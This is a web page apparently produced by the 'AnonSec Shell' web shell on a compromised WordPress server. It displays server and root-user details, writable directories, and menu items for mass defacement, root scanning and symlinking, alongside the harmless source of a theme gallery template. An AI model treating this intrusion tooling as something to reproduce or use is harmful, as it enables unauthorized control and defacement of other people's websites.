AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.147.75.111   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/themes/sammy/template-parts/parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/themes/sammy/template-parts/parts/gallery.php
<?php

	$post_id = get_the_ID();

	$gallery = get_post_meta($post_id, 'ova_met_gallery_id', true) ? get_post_meta($post_id, 'ova_met_gallery_id', true) : '';

	$carousel_id = 'carousel'.$post_id.'gallery';

	$k = 0;
	if($gallery){ $i=0; ?>

	    <div id="<?php echo esc_attr($carousel_id); ?>" 
	    	class="owl-carousel slide_gallery" 
	    	data-autoplay="true"
	    	data-autoplaytimeout="5000" 
	    	data-autoplayspeed="500"
	    	data-stoponhover="true"
	    	data-loop="true"
	    	data-dots="true"
	    	data-nav="false"
	    	data-items="1"
	    >

		  	<?php foreach ($gallery as $key => $value) { $active_dot = ( $k == 0 ) ? 'active' : ''; ?>
			    <div class="carousel-item <?php echo esc_attr($active_dot); $k++; ?>">
			    	<?php echo wp_get_attachment_image($value, 'large'); ?>
			    </div>
		   	<?php } ?>
		</div>
	   
	    <?php
	}

Anon7 - 2022
AnonSec Team